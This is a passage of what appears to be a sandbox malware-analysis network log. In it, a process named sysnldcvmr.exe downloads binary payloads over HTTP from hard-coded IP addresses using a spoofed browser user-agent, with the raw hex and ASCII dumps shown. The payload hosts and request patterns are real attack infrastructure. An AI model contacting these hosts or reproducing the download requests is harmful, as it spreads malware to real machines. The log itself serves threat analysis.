                                                                                                                  Nov 30, 2024 01:57:24.080260038 CET1236INData Raw: a3 9b 91 41 50 dd 80 d7 b0 77 c1 85 ae 83 44 81 dd c0 04 63 a3 11 90 99 5b ae f0 f8 38 dd 71 2d 21 80 71 5d bd 04 ba d3 63 92 a2 37 99 76 70 90 bc 1a 82 be ff 2e d3 d1 f4 f7 d3 6e a5 00 93 6e 46 7b 3c b8 93 7e c3 ba a7 1f 7a 64 95 ec 85 ed 72 c8
                                                                                                                  Data Ascii: APwDc[8q-!q]c7vp.nnF{<~zdrmXt$8&2c^_E98k-70~?]$==T+TM^e~'O(wGX\1Y&$_xFLz]BD6O
                                                                                                                  Nov 30, 2024 01:57:24.080272913 CET1236INData Raw: 2c 39 59 3b 8f 70 7a 08 ac ae 40 45 98 6c 63 bf 2e 99 7d 94 9a 8b f1 c3 cc 4a 57 06 c2 3e e9 9a 34 3d 9c 5c 75 16 3d de bc 1d 46 0f 84 f9 25 bc c9 d9 aa 24 17 92 da 25 5f 5e f7 dd 52 d7 27 49 e6 cd 18 a2 4b e0 34 5d 78 84 a9 f9 2b 90 9e a5 2e cc
                                                                                                                  Data Ascii: ,9Y;pz@Elc.}JW>4=\u=F%$%_^R'IK4]x+.i/ qh['3(@`{nl;UfB5!59uGJ0hR!u(*d:Serk)BdWmlE)Mt9
                                                                                                                  Nov 30, 2024 01:57:24.080287933 CET1236INData Raw: 3c 2c b2 17 d6 f6 a4 7f d9 76 5c 5d be de 02 8b 48 96 18 68 71 22 90 de 9d 34 6b 57 c9 fe 86 27 d7 fa 7b 1e 77 52 17 a8 34 f6 42 c9 a0 41 e9 93 3d 67 10 2d 53 92 19 a5 2a 4d d0 5e 8d 17 a9 aa 7e 13 e3 09 6c b8 87 76 86 5e 62 f7 25 c0 5c 83 5a 1c
                                                                                                                  Data Ascii: <,v\]Hhq"4kW'{wR4BA=g-S*M^~lv^b%\Z)zW0EZSM#x6Y=z)}s]KL\Bd@!qcBXfk=*}nfKWLFy6qijjq6b&?:2c4]&`iDl=z4
                                                                                                                  Nov 30, 2024 01:57:24.080491066 CET1236INData Raw: 9e 3c 8f 84 4e e0 13 c7 99 5e 0b bf 53 e6 4d 25 44 02 a3 7a 1d 2a 7f 61 ea 30 29 a1 ac 16 e6 e4 ce 74 93 05 15 d8 99 c1 dc 61 c8 99 e5 6f ff e0 a1 28 4a 81 cd 61 ff d7 cd 0d 67 7b 82 3b ff b6 90 35 3f 85 d9 f6 20 77 91 1a b7 fc 96 f8 37 c4 6d c3
                                                                                                                  Data Ascii: <N^SM%Dz*a0)tao(Jag{;5? w7m1j"zAJV,VjHN^C1uU\=AM-/!,]aYIRpoo9RjW`u-"W}v4dD8xhDtqUl/2:O!iKv^l
                                                                                                                  Nov 30, 2024 01:57:24.080516100 CET1236INData Raw: 47 37 46 e4 06 80 d3 00 31 a7 71 ee fb 51 f0 c3 5c 6c ec 9c fb 02 ba 5d e7 0a 8b da c9 8a aa 7a 17 c0 c3 58 dc 6d 6c 4d 69 8e ff 61 e4 f8 83 1f 0a fe d9 fe 0e 49 e3 78 30 66 5d b7 80 20 4b 92 88 aa 12 88 82 19 6f da 6e 74 74 13 cf 85 1c 04 e0 47
                                                                                                                  Data Ascii: G7F1qQ\l]zXmlMiaIx0f] KonttGp#3wdtgd(,v=-UsW^z]x&%tu=H%/}h+wy*(V#Qpg+I#rkr#rLw{bE*!NlH|3Wr:E
                                                                                                                  Nov 30, 2024 01:57:24.080528021 CET1236INData Raw: 6f 0b c3 62 a3 38 a7 e9 91 07 45 04 ab 68 ed de 3d c1 0c 0b 24 ac 3c 82 09 6e 4b 7e 33 0a 3a 8e dc 23 f3 36 da 9d 60 0c 00 c6 bc c1 2c 51 c5 d8 a8 d7 5f f6 ff e8 11 4b cd 78 d0 98 ab 4e 0c 6f bb c6 cf 28 98 55 bc 6c 10 2d b8 04 bc 06 cf 26 67 2b
                                                                                                                  Data Ascii: ob8Eh=$<nK~3:#6`,Q_KxNo(Ul-&g+,'3%{s3_3I')#&r|Fd aIQ<dX=lLv=1pjqZ)zo6hymsjw\#i0+Xx<)Y/'8}M8Q
                                                                                                                  Nov 30, 2024 01:57:24.081212044 CET625INData Raw: ee 05 c7 dd 0e 36 46 60 93 3a 2b 50 b2 86 d9 02 4a 9d dd 8f 5d 10 90 20 83 07 06 0d 4e 94 42 c8 3c 52 75 87 3f f3 51 a2 4f b6 d8 46 4e f3 84 78 ca d1 fb 54 2b 2c 40 63 18 f5 70 31 81 d4 12 2f af fe af 46 dd e6 77 15 40 23 79 24 77 05 fe 48 ae 8e
                                                                                                                  Data Ascii: 6F`:+PJ] NB<Ru?QOFNxT+,@cp1/Fw@#y$wHsa!z_NwwofcwHsyGPgO/j>hcw0*5Yv[X'*jq$:+L<kb'Gg(vqIJ


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  33192.168.2.449982185.215.113.66801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:57:26.501461983 CET166OUTGET /3 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:27.874023914 CET1236INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:57:27 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 63232
                                                                                                                  Last-Modified: Fri, 29 Nov 2024 08:44:56 GMT
                                                                                                                  Connection: keep-alive
                                                                                                                  ETag: "67497f08-f700"
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Raw: 33 f7 8b 96 d4 1c c5 f7 02 2d 3b f9 29 56 f5 f4 d6 d1 ab 1d a3 07 e3 94 06 db 98 58 8f a8 15 fd 7f 2a 5c a2 5a 7f 5e 53 dd 1e fd e9 2c 6e ac ad 71 ea 1a b3 2e 68 a2 20 49 ea a8 e0 84 a0 ef a9 83 65 db 9d c7 bf e1 92 3b 5a 7a b1 38 27 e1 0e b1 ad 9d 34 46 80 b2 41 72 1e b0 61 3d 58 04 36 4f 34 af 33 66 98 c3 62 e4 2d ff 5c 75 75 f3 20 e7 79 37 9b 19 b5 17 a2 ce 84 0a ad d0 c6 8c 15 30 70 5c 6b c4 92 aa 2c 95 d8 e3 b8 4e 58 6e 38 a5 ae f3 d7 30 b0 d0 18 34 65 f2 a6 49 88 07 9f 4f f7 44 af 44 64 61 ed de 19 46 71 f9 82 32 a3 5f 55 4f 88 b3 af c3 b3 37 c2 77 a2 6b 03 99 84 a0 97 c7 fa 4e 6c 85 2e d1 c9 a0 c9 63 48 9a bc 6b 3d 82 6b 52 64 94 fb 2d 30 37 3c af 78 bb d8 61 5c a1 84 19 88 fb e8 59 e6 d1 32 4a 01 8b ed 59 ef 69 92 b3 3f f8 1c ef 81 73 9a c2 56 62 00 68 5c ee ab 06 14 2f 08 27 10 3d f9 3b 0f 17 a5 5f 99 05 c8 b2 9b 39 e6 7f 4d c9 53 2a b9 8d 3b d9 b9 66 cd d5 f0 d9 d8 1f a6 78 8f 3b 7b 6c c2 42 40 2c b3 8b 4c e3 46 03 3f a4 77 00 31 00 62 2e 43 56 7d d7 90 dd c5 c5 37 b1 d9 e9 3d 04 fc 73 2f [TRUNCATED]
                                                                                                                  Data Ascii: 3-;)VX*\Z^S,nq.h Ie;Zz8'4FAra=X6O43fb-\uu y70p\k,NXn804eIODDdaFq2_UO7wkNl.cHk=kRd-07<xa\Y2JYi?sVbh\/'=;_9MS*;fx;{lB@,LF?w1b.CV}7=s/pQ[Gm+P3]1Y[)e=t|*wOQ;}GF:m k'h:rgrM$wygS^`3s^Ye2554KJL!.j^R4o6g?{x}iX1?rW-m4v&n%l:_yNauT}T!V9DKLM9#,f\c^870(7AVB4sy.mE$IRHF'!,a's\$qHV[*9RSrzKI74HyNtnC wY8Ih6;>EDbyEWIchP&="1".'R;a_-Uy/24(suQyGO8`)u3g9lW2(P>2^'r{g_!0i-(bgT?JfilC2`-N=TM[
                                                                                                                  Nov 30, 2024 01:57:27.874144077 CET124INData Raw: a9 e4 31 7f 61 96 d8 96 40 d0 9f 93 a5 20 8b 23 6f 3b cb 14 d6 52 f3 60 5f 88 a5 fd a6 7c 23 ca 95 7c 9b 98 8a dc 48 a2 ce 25 dd e3 81 30 53 09 1d 48 b4 39 7e ba 60 9d a5 86 b9 61 f6 17 af 61 2d e9 06 e3 ef ad 31 67 8c 1b 48 29 32 bf dc ac 73 0d
                                                                                                                  Data Ascii: 1a@ #o;R`_|#|H%0SH9~`aa-1gH)2sLGnc <k[63
                                                                                                                  Nov 30, 2024 01:57:27.874155998 CET1236INData Raw: d3 d3 c0 0b 8a 7f b8 97 4e 22 4f ca 14 06 f0 a4 fe ab cc ab ac 94 22 41 1c 65 72 b1 a1 b5 80 5e 31 c0 cd f5 46 7f 2e a6 44 0d c3 f3 5b 60 96 13 5c 9d b4 83 4f f6 f0 35 44 7d 2b ea 99 13 61 4c 2e 41 60 a3 15 7d 34 29 77 78 23 0f 30 4a ae 21 f3 ba
                                                                                                                  Data Ascii: N"O"Aer^1F.D[`\O5D}+aL.A`}4)wx#0J!8{(dw!DJ;hz|dNz=5%xuA~P{m2[Nz"Nz/`nO!|I7XL!z?K3GB&CPXL_6<$v!afZ96*.3
                                                                                                                  Nov 30, 2024 01:57:27.874378920 CET1236INData Raw: 2c 88 74 8b b7 76 62 a3 c9 c5 27 d0 2a 27 5c 3d 75 89 75 b6 08 e3 64 b7 af 9f 42 79 11 1c 3a 2f e8 fa 1f 02 ca 7a 20 84 ab 43 6c 66 1d 11 79 ac b5 00 76 a0 c4 46 b4 fc 34 6f d3 2b 57 54 fd 5a a7 ba 6a 03 af 6d 51 1f 49 41 51 5f 04 c7 8a c5 5b a2
                                                                                                                  Data Ascii: ,tvb'*'\=uudBy:/z ClfyvF4o+WTZjmQIAQ_[cg=8a;-t94g!]rG.sM=Is$aZt&ID. MzL2V7*QIu;5f;kIB*w%zH-L=_k_/i
                                                                                                                  Nov 30, 2024 01:57:27.874388933 CET248INData Raw: 7a fe 71 03 99 6d 41 8c fb 0c b8 8a 45 80 8e 7f ee d8 c3 f9 c4 c0 8c 7f b4 fd 48 e2 80 d4 a2 0b e7 83 a2 eb b5 e0 d3 1c 9b c2 5d 36 a2 1a fd fc b3 74 e2 3a 01 a3 46 ae f8 b7 c7 f6 76 71 10 6c 44 90 f8 85 c7 d1 11 19 b7 46 54 d6 b3 fe b3 a2 7c 9a
                                                                                                                  Data Ascii: zqmAEH]6t:FvqlDFT|JG9_,l{!G6eMqP_dUxqZI^lxA`_}Kc7aRk/;V)(9!U}hs0{TMuVZ1_7<zjv3
                                                                                                                  Nov 30, 2024 01:57:27.874970913 CET1236INData Raw: fc 04 b1 a3 61 a9 3e e9 b8 4f 99 39 08 9c 69 da 46 18 36 3a 4b 73 dc 66 d7 fd c6 fb 18 c4 f0 71 ec dd 69 3d 4e 7f d9 ab 61 42 45 69 3f 09 c2 f8 94 ed f4 9a d9 59 30 4f 65 5b 90 4f 6d 9a d5 80 e7 09 b9 42 31 f9 9c c9 1a 0a 46 5f a8 4d 51 63 eb a7
                                                                                                                  Data Ascii: a>O9iF6:Ksfqi=NaBEi?Y0Oe[OmB1F_MQc ~)sWh7z4>(our*Q< M9K=2B[,/+?~gg).L{A]rbAx=p5KZ;ZrZ_f5dQUe
                                                                                                                  Nov 30, 2024 01:57:27.875107050 CET1236INData Raw: c7 b6 4a 74 d2 29 ae 30 5a 13 0d c5 bd ad 85 62 e6 41 ba 2c db e4 33 17 af 92 97 e8 c2 50 6f d3 93 2b 1a d9 ef c8 8c ad 28 76 b1 0a 03 22 aa a4 9d d6 19 b7 f4 a3 21 68 33 93 55 49 99 92 85 49 83 f2 c1 f7 84 ba 94 17 67 0a b6 68 7c b3 3e 5f 83 de
                                                                                                                  Data Ascii: Jt)0ZbA,3Po+(v"!h3UIIgh|>_C+]`OG3de{tlnAj}xAD|kH9GV^zmT{y;c}w3pRy<V=5a=dUYW-XW>1-2$i00*vq=,P
                                                                                                                  Nov 30, 2024 01:57:27.875123978 CET248INData Raw: 4d 81 90 a2 d9 c9 ea 87 af e7 54 a4 00 ee 8f 86 4d 10 1b 06 cf bd 41 22 9f f2 47 09 3b 4c 20 17 59 91 37 2b c7 68 ae 66 7e 0f 1e 64 ca 7d 4d 56 36 9b 98 57 4e 5b 31 b4 bc 26 40 53 81 3d 1a 94 77 ce 40 60 b6 2c f1 68 f6 fc 84 5d 67 33 81 46 d2 a2
                                                                                                                  Data Ascii: MTMA"G;L Y7+hf~d}MV6WN[1&@S=w@`,h]g3Fq${:T;;hkRfjF7aC;@58Ht}uos(h/R#`qk1#a_Jx;JO)j <SmPC9P/ScTvD6>$Z
                                                                                                                  Nov 30, 2024 01:57:27.875399113 CET1236INData Raw: 4e 19 dd 3f ca 7c 76 56 25 cf d8 3b bc 0b cb e3 6b 61 d1 e8 74 ba 7b 9f f2 d9 3c 68 04 7d 8e 0f 0c b1 61 58 b2 89 2e a3 d7 a5 a6 67 de 63 77 82 29 21 e5 dc b8 b5 12 44 63 2f 26 6e 80 a8 59 93 9f f3 cb a5 38 f6 7d 47 18 0a fd 1a 10 c3 fc da 46 76
                                                                                                                  Data Ascii: N?|vV%;kat{<h}aX.gcw)!Dc/&nY8}GFvfnz)W'#vqDVkjGT$@o|fRdgFUVt't99#7><[CwN^>nxLWU63tuI-KS<9~
                                                                                                                  Nov 30, 2024 01:57:27.875412941 CET1236INData Raw: e5 38 c4 33 36 b0 03 f5 cd c9 c0 30 b1 37 44 42 dc 55 49 55 be c3 68 9c 69 c1 11 97 33 09 f5 76 ba 2b 0b 44 51 96 3f 74 91 be 35 c3 11 5f 83 8f cf 2a 84 ec eb a0 7d 4e 67 ca 43 62 ca 3b 51 15 6c 2a 2d 10 a2 fa b7 6f fe 5b 39 e1 7d f2 d3 40 47 ee
                                                                                                                  Data Ascii: 83607DBUIUhi3v+DQ?t5_*}NgCb;Ql*-o[9}@Gg~@kk3;w=eZLp<0 X6Gj6b1T2<=dMp.t/>,7HD)a,Cs} %)CLXw,df$F>k
                                                                                                                  Nov 30, 2024 01:57:27.994117975 CET1236INData Raw: 0a 6a 9f 08 33 5a b8 00 48 32 c0 9b 00 87 ff 75 44 54 a0 95 d1 eb 90 73 bc 0a c4 df 11 25 1f 31 aa b6 c3 e9 8c f3 97 77 2f 07 de 35 8c cb ba ad dd 7f 5a 81 a2 04 d4 61 14 71 3a 99 5f 6b 8e a0 d8 d1 1f 7d 48 03 a6 3a b5 d6 73 77 b7 85 37 8f 19 14
                                                                                                                  Data Ascii: j3ZH2uDTs%1w/5Zaq:_k}H:sw7d%hkc}s9BaOQQs?pisbbMFvQSE@l=)0x"./<x&+n>14#<Xo_:*q6!9


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  34192.168.2.449988185.215.113.66801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:57:30.591806889 CET166OUTGET /4 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:31.928805113 CET1236INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:57:31 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 55040
                                                                                                                  Last-Modified: Wed, 27 Nov 2024 12:44:32 GMT
                                                                                                                  Connection: keep-alive
                                                                                                                  ETag: "67471430-d700"
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Raw: a5 d1 27 01 80 df b4 90 f7 22 59 62 49 bd 72 10 5e 6c 42 5f 1c 89 9f 02 51 4d 78 3d 5e 77 28 5e cb 02 3a 58 3a c5 e0 84 da 2e 27 a6 19 84 4a 4f ee 08 33 84 cf 6b 04 b9 e1 3e 23 3e 89 7e fa 42 48 bc f9 b6 1e 73 91 7d 1f 65 ed a5 9a 66 26 40 c5 ff 74 8c 9d be 8a 65 1f 22 55 01 91 b5 68 4b 9a 48 57 10 d8 49 66 f1 5c 5d 98 bb 7c f8 41 87 54 8d 73 20 d1 5a c0 f4 bb 58 ad 46 80 bf 8b 88 96 66 f9 b3 b9 6c 03 e9 ac 53 0f 7e f4 90 e9 0b 3b ff 5f 10 92 6f fb 43 1d d2 b0 a7 96 02 e1 92 48 dc 16 5d e7 b9 11 2f a3 11 ba d4 06 8d 1b f8 90 b0 c0 2b ed 69 c6 3c bc 1e 69 d9 aa 13 bd d3 fc 63 04 97 ef 16 56 c3 bf 5c ec 7a 5f 20 33 b8 8c e6 b4 e8 48 e6 ec 7e 55 2c 56 17 55 9c 72 0a 50 65 41 b1 23 fc 0d 96 40 37 50 9a 83 06 ce 95 c0 60 4e 59 a0 5b 96 20 02 a5 2b 93 26 ea 8f 4e 19 b6 85 78 a4 7e 49 13 fd 9e 97 e4 aa 8f 81 01 9f 15 9d 90 f4 f4 a0 eb 9a a0 44 ba 98 14 42 87 ea ca fa 9a bf 1d a3 b3 b2 90 5c f6 14 db 1b 2f de 0f 92 6e c5 c2 28 2b 32 35 76 91 c5 36 98 6a c5 d0 4c b7 25 38 5c a0 5e 3f 5d 02 d4 1b be e7 00 ff [TRUNCATED]
                                                                                                                  Data Ascii: '"YbIr^lB_QMx=^w(^:X:.'JO3k>#>~BHs}ef&@te"UhKHWIf\]|ATs ZXFflS~;_oCH]/+i<icV\z_ 3H~U,VUrPeA#@7P`NY[ +&Nx~IDB\/n(+25v6jL%8\^?]xZI>ri[@s:p2yO6Q`L,h=8KLKZqaY=7"N5)/I&Os},D>)AS7rEpgsIuV`'A$]`\c3)xe.uW=Y"!-/if{":BKsWc%rW&dJ+g4a`2i=Pp*ks@?wCamFyN7y]Mg<.|smCvDO^_5NjX>,aF:S1xSgsP_z(FHOgZclxIq{.FQ=K3-kFI'~6eKLX 1:YO]S^mpkEbWXcF!wU4W]RHTcwkxbZm#&<r_Ee:gaP#_(3tjO
                                                                                                                  Nov 30, 2024 01:57:31.929083109 CET1236INData Raw: bb 3b 85 b5 56 c5 2a c5 de 28 e1 3a dd 6f 3f 3a 35 2d 53 79 7e b4 92 56 8e 87 da 28 35 12 36 e0 18 20 92 8f 17 51 d3 85 ff ee 32 e6 b3 3f 49 46 e4 34 32 6f d5 de f6 12 6b d8 23 43 17 fb b0 d6 3e 12 29 ee 91 88 fe 40 dc 1e 83 38 56 54 9b 20 93 66
                                                                                                                  Data Ascii: ;V*(:o?:5-Sy~V(56 Q2?IF42ok#C>)@8VT f`:zd!UT&RNEBUNfy7i4hlQJo[Rx[n@gU56QWO.|yDE.brfGY<NE$;F@6G*2r.2(z|FS\e<klZ'
                                                                                                                  Nov 30, 2024 01:57:31.929095030 CET248INData Raw: b6 67 15 e1 f1 a7 67 d2 68 94 11 e9 01 da 41 ba 6b b8 25 d9 5d 28 3a ca 3e 64 aa 95 d3 fa f2 53 4d 11 76 63 43 d2 bc c9 c9 bb 29 49 c4 14 44 e8 82 3e 2f 2c 96 f5 ff ea 5d 0a 1e 20 7c 83 0d 16 7b 1f 87 54 85 d6 79 95 9c 71 2a d2 08 6e 3d 5c f9 21
                                                                                                                  Data Ascii: gghAk%](:>dSMvcC)ID>/,] |{Tyq*n=\!Tofm`54Rh!x.r-#;z$Ahq)$c_]\QvO7Jy_ED;B1q8dJ5-H?];91oElK4V #~
                                                                                                                  Nov 30, 2024 01:57:31.929750919 CET1236INData Raw: 54 ed b6 5c b4 5e b7 db dc d7 d6 72 fa 0b dc 8d a2 74 d8 f6 42 bb 4c a2 08 e3 5a bf d9 98 b5 ca f2 bd 00 91 68 70 86 69 56 70 f3 ea 5f d2 d6 ac 0c fb 80 a3 bf 5a 3d 39 c8 3f 50 1e 76 bd 32 ed cf c1 44 a7 ce 43 56 cb 1f 8e 45 cf b7 0c 1b 23 fb 94
                                                                                                                  Data Ascii: T\^rtBLZhpiVp_Z=9?Pv2DCVE#,uoL@Vm0Ke,3,q>eHaE[p\W<gs\sjS~|4z<m~as}&A|\7]MYac.-B
                                                                                                                  Nov 30, 2024 01:57:31.929946899 CET1236INData Raw: f7 82 a7 f6 3f b0 06 58 f4 de 38 b9 fa 02 93 2f f2 20 b0 71 0e 61 9e c5 01 03 2c df 0d 1f be 59 2b 89 c5 0f da f3 73 36 11 9c 2b 7a 79 80 79 a1 d2 c0 01 dd 83 96 66 49 64 ad 2c 9b 7d 09 b4 3c c0 da eb 92 e1 a6 55 b8 87 e2 46 14 3c a7 ff 12 3b 27
                                                                                                                  Data Ascii: ?X8/ qa,Y+s6+zyyfId,}<UF<;'j"A_q_lYG$t``--i^Lv#;{-5F,d%&#K(MW,gf"=g,Fnl*8NBa&
                                                                                                                  Nov 30, 2024 01:57:31.929960012 CET1236INData Raw: cb b4 28 98 57 a4 d3 be ef a6 fd ec a9 c4 cb 01 51 f8 48 3e 45 1e 95 63 b4 2c 6b 3e af de 6f 4b b7 dc 35 2a d5 05 9e e6 86 92 c1 47 8b 1d 79 dc 38 e5 b9 51 4c 48 94 d4 7d 1e a7 2d 55 b7 bb cc a1 4d 16 ed b5 a1 8b 07 86 53 0d 3b 35 7f 88 c5 d3 44
                                                                                                                  Data Ascii: (WQH>Ec,k>oK5*Gy8QLH}-UMS;5D|(\PmQ.nS|N>`kl#<AQ=OFDye%|[O=Ex&~-8 5!?3{`v*nker2
                                                                                                                  Nov 30, 2024 01:57:31.930412054 CET372INData Raw: 64 c4 f5 2f be f6 97 06 1c b5 40 8b 60 2f f3 d7 91 c9 6a fa c5 a9 31 5f ee a3 19 5d 61 89 50 0e 9c 34 97 74 9e fd d4 b4 d9 c6 23 cf 12 be 2e 6f 6f b1 3d 46 a0 78 e5 35 b5 a1 2d 6c a4 74 05 32 bf 9f 30 61 2e f1 37 e7 b2 0d 4d c2 f4 6f d7 a1 96 f2
                                                                                                                  Data Ascii: d/@`/j1_]aP4t#.oo=Fx5-lt20a.7Mo#bQZ1VC;)tu^Dr5YP]|3Y-A~=8ES7"K8\I;V"6SF-yU:GUvzXf(t2yJ@j+l|t
                                                                                                                  Nov 30, 2024 01:57:31.930552959 CET1236INData Raw: e5 df 71 cd 37 76 0e c6 52 6e a4 8e 0f 16 54 21 74 70 c2 47 ba 9f b9 41 2a a7 75 4f 04 0a dd 7f b1 33 8f fc 9f be 05 51 b6 b5 5c 37 b9 f0 0c 80 09 af 3d a8 94 d8 7b 38 4e 80 49 b7 4d 50 15 04 c8 99 c3 12 c9 0c 58 5e 7e 75 a6 02 8d db a6 68 23 16
                                                                                                                  Data Ascii: q7vRnT!tpGA*uO3Q\7={8NIMPX^~uh#g\98c2"*AC&h-nQe)6@kWvLq+&DsbQobfeg-7, sKVN6L$=q%H2}j_Y^7.7,e1zb
                                                                                                                  Nov 30, 2024 01:57:31.930857897 CET1236INData Raw: 78 e1 80 d4 e8 44 8d 9d b8 f2 04 a8 25 0c af d0 b2 bb 8f 07 96 dc 25 ee e9 be 9b 84 8a 7f 78 e0 59 a8 24 91 6a 6d e1 17 d7 b3 c6 2f 4f 2f 7b cd 2c 5f 5d b2 f1 4e d7 ea 76 fd dc ff e9 c2 c0 cd 33 01 ef 79 32 5e 5b 14 d6 63 50 61 53 9e d5 1e 5a b3
                                                                                                                  Data Ascii: xD%%xY$jm/O/{,_]Nv3y2^[cPaSZ!;]CJhc#V.WB;0Wt{dW1j/owjun2}$RV0awDeSfb!^zK}BvH*@%n3lo 6f'5-
                                                                                                                  Nov 30, 2024 01:57:31.930870056 CET448INData Raw: 86 7f b2 4c cf 50 34 41 d8 dd 51 ff a4 a8 19 d8 e2 0a 05 af 73 0f f4 c1 b8 7f 06 d7 e1 cc e8 7e 9e f9 38 99 04 b4 23 f8 16 7c 08 17 61 63 1c 04 12 9a d0 22 b5 1e 15 b6 cf 26 76 b4 4f e3 18 85 c9 98 eb af bd 98 13 41 62 6a a4 76 b4 e9 35 91 2c d3
                                                                                                                  Data Ascii: LP4AQs~8#|ac"&vOAbjv5,K&{/'e)9qZ3{3'C+,qN*!v.*Dt!R:&re=L<.-X8;bqn%/`az\ube%I#&s
                                                                                                                  Nov 30, 2024 01:57:32.049455881 CET1236INData Raw: 03 9b a8 3e ae 7a 97 12 87 3e 61 e3 70 f5 90 2d 4c 43 df 13 a9 64 ad f9 3e 5f 93 60 b9 0d 80 e1 7d b5 97 7b 9d 39 a7 f0 f0 38 ed a2 b9 34 d8 0e c7 33 77 42 b5 58 49 79 ea cc 7d c7 cf 43 ec 44 8f 22 b2 cc f4 d4 4d 6c 5c 76 cf 04 87 26 29 bf 7f 40
                                                                                                                  Data Ascii: >z>ap-LCd>_`}{9843wBXIy}CD"Ml\v&)@Z@\mM3$`kE '<ET|7eD-a`2[B^FSsOIP/9Du*cj- HtixpVPg\,O16Td


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  35192.168.2.450000185.215.113.66801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:57:34.150016069 CET166OUTGET /5 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:35.523416042 CET728INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:57:35 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  36192.168.2.45001191.202.233.141801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:57:38.852484941 CET166OUTGET /1 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 91.202.233.141
                                                                                                                  Nov 30, 2024 01:57:40.230622053 CET728INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:57:39 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: keep-alive
